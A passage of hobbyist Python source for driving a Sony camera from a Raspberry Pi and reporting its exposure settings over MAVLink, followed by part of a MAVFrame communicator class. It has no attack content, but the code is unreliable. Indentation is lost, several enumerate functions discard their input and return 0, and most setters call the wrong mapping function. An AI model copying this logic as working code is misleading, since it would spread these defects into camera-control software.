cmd='/home/pi/cams/SonyTEST32/get_shutter/RemoteCli '
args = shlex.split(cmd)
s=subprocess.Popen(args, stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "Shutter_Value"], stdin=s.stdout, stdout=subprocess.PIPE) # look for only this string in the output
output = p2.communicate()[0]
print(output)
s.stdout.close()
# consider if needed (if check of setval isnt working look for "cancelled" in the program output
#
# s=subprocess.Popen(args, stdout=subprocess.PIPE)
# p3 = subprocess.Popen(["grep", "cancelled"], stdin=s.stdout, stdout=subprocess.PIPE)
# output2 = p3.communicate()[0]
z = output.decode('ascii') # convert bytes array output to ascii string
a = shlex.split(z) # split this unique output into fields separated by commas
#
# Using this parser as it sometimes missed the bracket at the start (odd??) in the popen output
# we get the value fields before and after and return that list
#
itemNo = 0
idx = 99999
answers = []
for xx in a:
if xx.find('Shutter_Value') > -1:
idx = itemNo
else:
if (idx != 99999):
if xx.find(':') > -1:
idx = itemNo
else:
if not (xx.isdigit()):
if xx.find("AUTO") > -1:
xx = 0
xx = xx.replace(",","")
vv = xx.strip("}") # caters for a case in testing where i have closing bracket 34}
answers.append(vv)
idx = 99999
itemNo += 1
return answers
# ======================= new additions to the class ================================================
def setSonyObjData( self, mem, camDataPointVal, Timeout = 20 ):
if not (mem.set_value(camDataPointVal, mem.STATE_CAM_WRITING, Timeout) == True):
print("value has not been successfully set")
return True
else:
return False
def initSonyCamExProData( self ):
ans = self.get_sony_ex_pro( )
if not (ans is None):
if (len(ans) > 0):
print(f" Exposure Prog Mode = {ans}")
try:
SonyObject = memoryValue('sonyExProMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyExProMode',0)
else:
print("Failed get the camera ExPro")
SonyObject = memoryValue('sonyExProMode',0)
else:
print("Cant get Exposure Prog Mode ")
SonyObject = memoryValue('sonyExProMode',0)
return SonyObject
def getSonyCamExProData( self, mem ):
ret = False
ans = self.get_sony_ex_pro( )
if not (ans is None):
if (len(ans) > 0):
print(f" exposure program mode = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the exposure program mode")
else:
print("Cant get Exposure Prog Mode ")
return ret
def initSonyApertureData( self ):
ans = self.get_sony_aperture( )
if not (ans is None):
if (len(ans) > 0):
print(f" Aperture = {ans}")
try:
SonyObject = memoryValue('sonyAperture',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyAperture',0)
else:
print("Failed get the camera aperture")
SonyObject = memoryValue('sonyAperture',0)
else:
print("Cant get Aperture ")
SonyObject = memoryValue('sonyAperture',0)
return SonyObject
def getSonyApertureData( self, mem ):
ret = False
ans = self.get_sony_aperture( )
if not (ans is None):
if (len(ans) > 0):
print(f" aperture = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the aperture")
else:
print("Cant get aperture ")
return ret
def initSonyCamFocusData( self ): ###### @@11
ans = self.get_sony_focus( )
if not (ans is None):
if (len(ans) > 0):
print(f" Focus Mode = {ans}")
try:
SonyObject = memoryValue('sonyFocusMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyFocusMode',0)
else:
print("Failed get the camera focus mode")
SonyObject = memoryValue('sonyFocusMode',0)
else:
print("Cant get Focus Mode ")
SonyObject = memoryValue('sonyFocusMode',0)
return SonyObject
def getSonyCamFocusData( self, mem ):
ret = False
ans = self.get_sony_focus( )
if not (ans is None):
if (len(ans) > 0):
print(f" focus = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the focus")
else:
print("Cant get focus ")
return ret
def initSonyCamFocusAreaData( self ):
ans = self.get_sony_focus_area( )
if not (ans is None):
if (len(ans) > 0):
print(f" Focus Area = {ans}")
try:
SonyObject = memoryValue('sonyFocusArea',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyFocusArea',0)
else:
print("Failed get the camera focus area")
SonyObject = memoryValue('sonyFocusArea',0)
else:
print("Cant get Focus Mode ")
SonyObject = memoryValue('sonyFocusArea',0)
return SonyObject
def getSonyCamFocusAreaData( self, mem ):
ret = False
ans = self.get_sony_focus_area( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the iso")
else:
print("Cant get focus area ")
return ret
def initSonyCamISOData( self ):
ans = self.get_sony_iso( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
SonyObject = memoryValue('sonyISO',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyISO',0)
else:
print("Failed get the camera iso")
SonyObject = memoryValue('sonyISO',0)
else:
print("Cant get ISO ")
SonyObject = memoryValue('sonyISO',0)
return SonyObject
def getSonyCamISOData( self, mem ):
ret = False
ans = self.get_sony_iso( )
if not (ans is None):
if (len(ans) > 0):
print(f" ISO = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the iso")
else:
print("Cant get iso ")
return ret
def initSonyCamShutSpdData( self ):
ans = self.get_sony_shut_spd( )
if not (ans is None):
if (len(ans) > 0):
print(f" Shutter Speed = {ans}")
try:
SonyObject = memoryValue('sonyShutSpd',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyShutSpd',0)
else:
print("Failed get the camera iso")
SonyObject = memoryValue('sonyShutSpd',0)
else:
print("Cant get Shutter Speed ")
SonyObject = memoryValue('sonyShutSpd',0)
SonyObject.updateNeeded = True
return SonyObject
def getSonyCamShutSpdData( self, mem ):
ret = False
ans = self.get_sony_shut_spd( )
if not (ans is None):
if (len(ans) > 0):
print(f" Shutter Speed = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the shutter speed")
else:
print("Cant get shutter speed ")
return ret
def initSonyCamWhiteBalaData( self ):
ans = self.get_sony_white_balance( )
if not (ans is None):
if (len(ans) > 0):
print(f" White Balance = {ans}")
try:
SonyObject = memoryValue('sonyWhiteBalance',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyWhiteBalance',0)
else:
print("Failed get the camera white balance")
SonyObject = memoryValue('sonyWhiteBalance',0)
else:
print("Cant get Shutter Speed ")
SonyObject = memoryValue('sonyWhiteBalance',0)
return SonyObject
def getSonyCamWhiteBalaData( self, mem ):
ret = False
ans = self.get_sony_white_balance( )
if not (ans is None):
if (len(ans) > 0):
print(f" White Balance = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the camera white balance")
else:
print("Cant get white balance ")
return ret
def initSonyCamStillCapModeData( self ):
ans = self.get_sony_still_cap_mode( )
if not (ans is None):
if (len(ans) > 0):
print(f" Still Cap Mode = {ans}")
try:
SonyObject = memoryValue('sonyStillCapMode',int(ans[0]))
SonyObject.updateNeeded = True
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
SonyObject = memoryValue('sonyStillCapMode',0)
else:
print("Failed get the camera still capture mode")
SonyObject = memoryValue('sonyStillCapMode',0)
else:
print("Cant get Still Capture Mode ")
SonyObject = memoryValue('sonyStillCapMode',0)
return SonyObject
def getSonyCamStillCapModeData( self, mem ):
ret = False
ans = self.get_sony_still_cap_mode( )
if not (ans is None):
if (len(ans) > 0):
print(f" Still Cap Mode = {ans}")
try:
ret = self.setSonyObjData( mem, int(ans[0]) )
except Exception as err_msg:
print("Failed set the object to initial value : %s" % (err_msg))
else:
print("Failed get the camera still capture mode")
else:
print("Cant get still cap mode ")
return ret
def enumerate_still_cap( self, num ):
num = 0
if num == 65543:
enum_num = 2
return num
def enumerate_aperture( self, num ):
num = 0
if num == 280:
enum_num = 0
return num
def enumerate_iso( self, num ):
if num == 0:
enum_num = 0
elif num == 50:
enum_num = 1
elif num == 64:
enum_num = 2
elif num == 80:
enum_num = 3
elif num == 100:
enum_num = 4
elif num == 125:
enum_num = 5
elif num == 160:
enum_num = 6
elif num == 200:
enum_num = 7
elif num == 250:
enum_num = 8
elif num == 320:
enum_num = 9
return num
def enumerate_ex_pro( self, num ):
num = 0
if num == 32859:
enum_num = 2
return num
def enumerate_focus_area( self, num ):
num = 0
if num == 1:
enum_num = 0
return num
def enumerate_focus( self, num ):
num = 0
if num == 2:
enum_num = 0
return num
def enumerate_shutter( self, num ):
num = 0
if num == 0:
enum_num = 0
return num
def enumerate_white_bal( self, num ):
num = 0
if num == 0:
enum_num = 0
return num
def setSonyCamISOData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_iso(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1 # no retries
print(f"set to ISO {reqDat} {prevDat}")
if (not (reqDat == mavlinkSonyCamWriteVals.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_iso( self.enumerate_iso(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_iso(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2 # no retries
ret = ( ans[1] == reqDat )
#exit(101)
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamApertureData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_aperture(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1 # no retries
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_aperture( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_aperture(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2 # no retries
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamExProData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_ex_pro(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_ex_pro( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_ex_pro(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamFocusData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_focus(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_focus( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_focus(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamFocusAreaData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_focus_area(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_focus_area( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_focus_area(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamShutSpdData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_shutter(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_shutter( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_shutter(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamWhiteBalaData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_white_bal(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_white_bal( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_white_bal(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
def setSonyCamStillCapModeData( self, mem, mavObj, timeout1=100, timeout2=50, no_timeout1_retry=1, no_timeout2_retry=1 ):
ret = False
readSuccess = False
#
timeout1 = timeout1 * no_timeout1_retry
timeout2 = timeout2 * no_timeout2_retry
#
while (readSuccess == False) and (timeout1 > 0):
reqDat, prevDat, readSuccess = mavObj.getVal_sony_still_cap_mode(mavObj.STATE_CAM_READING,timeout1)
timeout1 -= timeout1
if (not (reqDat == mavObj.STATE_INIT) and not (reqDat == prevDat)):
ans = self.set_sony_still_cap( self.enumerate_still_cap(reqDat) )
if not (ans is None): #
writeSuccess = False
while (writeSuccess == False) and (timeout2 > 0):
writeSuccess = mavObj.setVal_sony_still_cap_mode(ans[1],mavObj.STATE_CAM_WRITING,mavObj.WRITE_PREV_DATA,timeout2)
timeout2 -= timeout2
ret = ( ans[1] == reqDat )
if ( ret == True ):
ret = self.setSonyObjData( mem, int(ans[1]) )
return ret
#
# would go into mavlink class if it was in multi-tasking mode
#
def sendMavlinkMessageForObject( self, obj, the_connection, Timeout=5 ):
if (obj.updateNeeded == True):
# send mavlink message obj.name obj.signal obj.numberOfVals
#
getName, getValueforMAVSending, getPrev, myState = obj.get_value_data(obj.STATE_MAV_READING, Timeout)
if (myState == True):
try:
the_connection.mav.param_value_send(
getName.encode('ascii'),
getValueforMAVSending,
mavutil.mavlink.MAV_PARAM_TYPE_UINT32,
obj.numberOfVals,
1)
ret = True
except Exception as err_msg:
print("Failed to send param value message : %s" % (err_msg))
ret = False
if (ret == True):
writeSuccess = False
TimeCount = 0
while (writeSuccess == False) and (Timeout > TimeCount):
# obj.updateNeeded = False
writeSuccess = obj.set_update_flag( False, obj.STATE_MAV_WRITING )
TimeCount += 1
return ret
#
# Pymavlink Library
# Acknowledgements:
# Thank you to Andrew Tridgell, the mastermind behind pymavlink and MAVProxy
# Thread code from http://stackoverflow.com/questions/730645/python-wxpython-doing-work-continuously-in-the-background
# Serial port code taken from http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
# UDP http://snakeproject.ru/rubric/article.php?art=python_udp_network_server_client
# AirCamPro :- 21/10/21 support android kivy serial driver
#
# when you install pymavlink you also need to use mavgen to generate the libraries
# instructions are shown here
# https://mavlink.io/en/mavgen_python/
# https://github.com/ArduPilot/pymavlink/blob/master/mavutil.py
# ref to multi-threading using asyncio
#
# https://python-scripts.com/sleep#threading-event
# vasile.buldumac@ati.utm.md
#
# sudo apt-get install python3-dev python3-opencv python3-wxgtk4.0 python3-pip python3-matplotlib python3-lxml
# sudo apt-get install libxml++2.6-dev
# sudo pip install dronekit
# ================== Compatible Joysticks =========================================
# X-Box 360 Controller (name: "Xbox 360 Controller")
# Playstation 4 Controller (name: "PS4 Controller")
# X-Box 360 Controller (name: "Controller (XBOX 360 For Windows)")
#
from pymavlink import mavutil # ref:- https://www.ardusub.com/developers/pymavlink.html
#import wx
import sys, serial, glob, threading
# for serial message out packing
import struct
# this is included for android serial and to detect the android platform using kivy
# ref:- https://github.com/frmdstryr/kivy-android-serial
# install kivy with the following in your conda environment
# conda install kivy -c conda-forge
#`from kivy.utils import platform
# from kvserial.driver import CdcAcmSerialPort
# to list ports using the serial library
from serial.tools import list_ports
BUTTON_CONNECT = 10
BUTTON_ARM = 20
# ethernet UDP communication and joystick
#
# python3 -m pip install -U pygame --user
import socket
import pygame
JOYSTICK_UDP_PORT = 14556
JOY_SCALE = 1000
MAX_SCALE = 32767
X_MAX = MAX_SCALE
Y_MAX = MAX_SCALE
MAV_TARGET = 110
MAV_SOURCE = 30
# import pymavlink.dialects.v10.lapwing as mavlink
# this is a custom dialect which i cant find
# this chooses version 1 you would need to change the ACK function TODO
#
# from mavlink_python_libs import com1 as commonV1
# import com1 as mavdefs
#
#from mavlink_python_libs import com2 as commonV1
#from my_python_libs import com2 as commonV1
#import com2 as mavdefs
import math
import time
import array as arr
#from mypymavlink import mavutilcust as custommav
#
# multithreading control via asyncio
#
import asyncio
import time
import numpy as np
import os
# ============== control Raspberry Pi IO ===============
# sudo apt-get install rpi.gpio
#
#import RPi.GPIO as GPIO
# to use Raspberry Pi board pin numbers
#GPIO.setmode(GPIO.BOARD)
# set up the GPIO channels - one input and one output here
#GPIO.setup(11, GPIO.IN)
#GPIO.setup(12, GPIO.OUT)
#---------------------------------------------------------------------------
class fifo(object):
def __init__(self):
self.buf = []
def write(self, data):
self.buf += data
return len(data)
def read(self):
return self.buf.pop(0)
import re
# mavlink communicator class (without GUI)
#
class MAVFrame():
RCV_COMMAND = mavutil.mavlink.MAV_CMD_REQUEST_MESSAGE
RPM2 = 0
ACK_RESULT = mavutil.mavlink.MAV_RESULT_UNSUPPORTED
DEFAULT_SYS_ID = 1
ACK_ALL_DATA_COMPLETE = 99
CAMERA_INFORMATION = 259 #camera_information
CAMERA_SETTINGS = 260
STORAGE_INFORMATION = 261
CAMERA_CAPTURE_STATUS = 262
CAMERA_IMAGE_CAPTURED = 263
VIDEO_STREAM = 269
# camera informations (default camera routines will retrieve this)
time_boot_ms = 1
firmware_version = 12
focal_length = 1.1
sensor_size_h = 3.0
sensor_size_v = 4.0
flags = 4
resolution_h = 300
resolution_v = 400
cam_definition_version = 2
#vendor_name_nd = np.dtype([('A',np.uint8)])
#model_name_nd = np.dtype([('B',np.uint8)])
#vendor_name_list = [65]
#model_name_list = [67]
#vendor_name = "A"
#model_name = "B"
lens_id = 1
cam_definition_uri = "http://10.0.2.51/cam_defs"
# camera settings
mode_id = 3 # Camera mode
zoomLevel = 7 # Current zoom level (0.0 to 100.0, NaN if not known)*/
focusLevel = 9
# storage informations
total_capacity = 1.2 # [MiB] Total capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
used_capacity = 1.1 # [MiB] Used capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
available_capacity = 0.1 # [MiB] Available storage capacity. If storage is not ready (STORAGE_STATUS_READY) value will be ignored.
read_speed = 0.67 # [MiB/s] Read speed.
write_speed = 0.76 # [MiB/s] Write speed.
storage_id = 1 # Storage ID (1 for first, 2 for second, etc.)
storage_count = 2 # Number of storage devices
status = 0
#status = mavutil.mavlink.STORAGE_STATUS_READY
# camera capture status
image_interval = 3.3 # [s] Image capture interval
recording_time_ms = 10000 # [ms] Time since recording started
available_capacity = 0.34 # [MiB] Available storage capacity.
image_status = 1 # Current status of image capturing (0: idle, 1: capture in progress, 2: interval set but idle, 3: interval set and capture in progress)
video_status = 1 # Current status of video capturing (0: idle, 1: capture in progress)
image_count = 11
# video stream
framerate = 30.0 # [Hz] Frame rate.
bitrate = 3000 # [bits/s] Bit rate.
Vflags = 3 # Bitmap of stream status flags.
Vresolution_h = 300 # [pix] Horizontal resolution.
Vresolution_v = 400 # [pix] Vertical resolution.
rotation = 90 # [deg] Video image rotation clockwise.
hfov = 45 # [deg] Horizontal Field of view.
stream_id = 2 # Video Stream ID (1 for first, 2 for second, etc.)
count = 4 # Number of streams available.
stream_type = mavutil.mavlink.VIDEO_STREAM_TYPE_MPEG_TS_H264 # Type of stream.
videoname = "vid_001"
video_uri = "http://10.0.0.56/vids/001.mov"
# camera image captured
time_utc = 667700 # [us] Timestamp (time since UNIX epoch) in UTC. 0 for unknown.
lat = 30 # [degE7] Latitude where image was taken
lon = 40 # [degE7] Longitude where capture was taken
alt = 11 # [mm] Altitude (MSL) where image was taken
relative_alt = 12 # [mm] Altitude above ground
q = [1,0,0,0] # Quaternion of camera orientation (w, x, y, z order, zero-rotation is 0, 0, 0, 0)
image_index = 4 # Zero based index of this image (image count since armed -1)
camera_id = 1 # Camera ID (1 for first, 2 for second, etc.)
capture_result = 1 # Boolean indicating success (1) or failure (0) while capturing this image.
file_url = "http://10.1.2.3/img/1.jpg"
# camera feedback
time_usec = 10000
cam_idx = 1
img_idx = 1
# already lat,
lng = lon
alt_msl = 2
alt_rel = 4
roll = 6
pitch = 1
yaw = 2
foc_len = 7
CFflags = 3
ACK_ERROR = 0
errRCV_COMMAND = 0
errRPM2 = 0
# task control flag
#
task_control_1 = 0
# global constants
#
GOT_ERROR = 1
GOT_SUCCESS = 2
GOT_BAD = 3
GOT_UNFORMAT = 4
# used to decide what is being requested from the calling (GCS) station
#
type_of_msg = 0
g_count = 0
pin_no = 0
# defines for camera ID file
#
CAM_XML_FILE = "alpha_cam_new.xml"
NETWORK_ID = 1
def __init__(self, pinNum=26):
#self.setUPPiRelayNumBCM()
#self.setPinINput(pinNum)
MAVFrame.pin_no=pinNum
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
#
# check our operating system
#
def check_os( self ):
if ((sys.platform=='linux2') or (sys.platform=='linux')): return 1
elif sys.platform=='win32': return 2
else: return 3
def update_utc_label( self ):
if (self.check_os() == 1):
cmd = "date +%s"
self.time_utc = os.popen(cmd).read()
def update_uptime_label( self ):
if (self.check_os() == 1):
cmd = "uptime"
upTimStr = os.popen(cmd).read().split(",")
dd = upTimStr[0].split()
days = int(dd[2])
xx = dd[0].split(":")
hours = int(xx[0])
mins = int(xx[1])
secs = int(xx[2])
self.time_boot_ms = (days*60*60*24) + (hours*60*60) + (mins*60) + secs
#print(f"boot tim {self.time_boot_ms} { (days*60*60*24) + (hours*60*60) + (mins*60) + secs }")
def on_click_connect(self,e):
#"""
#Process a click on the CONNECT button
#Attempt to connect to the MAV using the specified port and baud rate,
#then subscribe a function called check_heartbeat that will listen for
#a heartbeat message, as well as a function that will print all incoming
#MAVLink messages to the console.
#"""
port = self.cb_port.GetValue()
baud = int(self.cb_baud.GetValue())
self.textOutput.AppendText("Connecting to " + port + " at " + str(baud) + " baud\n")
self.master = mavutil.mavlink_connection(port, baud=baud)
self.thread = threading.Thread(target=self.process_messages)
self.thread.setDaemon(True)
self.thread.start()
self.master.message_hooks.append(self.check_heartbeat)
self.master.message_hooks.append(self.check_rcv_data_msg)
self.master.message_hooks.append(self.log_message)
print("Connecting to " + port + " at " + str(baud) + "baud")
self.textOutput.AppendText("Waiting for APM heartbeat\n")
return
def on_click_arm(self,e):
#"""
#Process a click on the ARM button
#Send an arm message to the MAV, then subscribe a function called
#check_arm_ack that will listen for a positive confirmation of arming.
# """
self.textOutput.AppendText("Arming motor\n")
print("******arming motor*********")
self.master.arducopter_arm()
self.master.message_hooks.append(self.check_arm_ack)
def log_message(self,caller,msg):
if msg.get_type() != 'BAD_DATA':
print(str(msg))
return
def process_messages(self):
#"""
#This runs continuously. The mavutil.recv_match() function will call mavutil.post_message()
#any time a new message is received, and will notify all functions in the master.message_hooks list.
#"""
while True:
msg = self.master.recv_match(blocking=True)
if not msg:
return
if msg.get_type() == "BAD_DATA":
if mavutil.all_printable(msg.data):
sys.stdout.write(msg.data)
sys.stdout.flush()
def check_heartbeat(self,caller,msg):
#"""
#Listens for a heartbeat message
#Once this function is subscribed to the dispatcher, it listens to every
#incoming MAVLINK message and watches for a 'HEARTBEAT' message. Once
#that message is received, the function updates the GUI and then
# unsubscribes itself.
#" ""
if msg.get_type() == 'HEARTBEAT':
self.textOutput.AppendText("Heartbeat received from APM (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.master.message_hooks.remove(self.check_heartbeat)
def check_arm_ack(self, caller, msg):
#"""
#Listens for confirmation of motor arming
#Once this function is subscribed to the dispatcher, it listens to every
#incomign MAVLINK message and watches for the "Motor armed!" confirmation.
#Once the message is received, teh function updates the GUI and then
#unsubscribes itself.
#"""
if msg.get_type() == 'STATUSTEXT':
if "Throttle armed" in msg.text:
self.textOutput.AppendText("Motor armed!")
self.master.message_hooks.remove(self.check_arm_ack)
def check_rcv_data_msg(self, msg):
if msg.get_type() == 'RC_CHANNELS':
self.textOutput.AppendText("RC Channel message (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("chan1 %u chan2 %u)\n" % (self.master.chan1_raw, self.master.chan2_raw))
self.master.message_hooks.remove(self.check_rcv_data_msg)
elif msg.get_type() == 'COMMAND_LONG':
self.textOutput.AppendText("Long message received (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("Command %u p1 %u p2 %u p3 %u p4 %u \n" % (self.master.command, self.master.param1, self.master.param2, self.master.param3, self.master.param4))
self.textOutput.AppendText("p5 %u p6 %u p7 %u \n" % (self.master.param5, self.master.param6, self.master.param7))
self.master.message_hooks.remove(self.check_rcv_data_msg)
elif msg.get_type() == 'CAMERA_IMAGE_CAPTURED':
self.textOutput.AppendText("Cam Cap message received (system %u component %u)\n" % (self.master.target_system, self.master.target_component))
self.textOutput.AppendText("lat %u lon %u alt %u\n" % (self.master.lat, self.master.lon, self.master.alt))
self.textOutput.AppendText("URL %u)\n" % (self.master.file_url))
self.master.message_hooks.remove(self.check_rcv_data_msg)
def OnClose(self, e):
self._mgr.UnInit()
self.Close()
def serial_ports(self):
#"""Lists all available serial ports
#:raises EnvironmentError:
# On unsupported or unknown platforms
#:returns:
# A list of available serial ports
#"""
if 'ANDROID_BOOTLOGO' in os.environ: # detect android first as if using sys alone, it returns linux
#if platform == 'android': using kivy instead
ports = '/dev/ttyACM0'
else:
if sys.platform.startswith('win'):
ports = ['COM' + str(i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('linux2') or sys.platform.startswith('cygwin'): # check this shows /dev/ttyAMA0 on raspberry pi.
# this is to exclude your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'): # apple mac support if using darwin
ports = glob.glob('/dev/tty.*')
else:
ports = list_ports.comports() # Outputs list of available serial ports should do the rest e.g. riscos atheos os2 freebsd aix etc
if len(ports) == 0:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
if 'ANDROID_BOOTLOGO' in os.environ: # device android
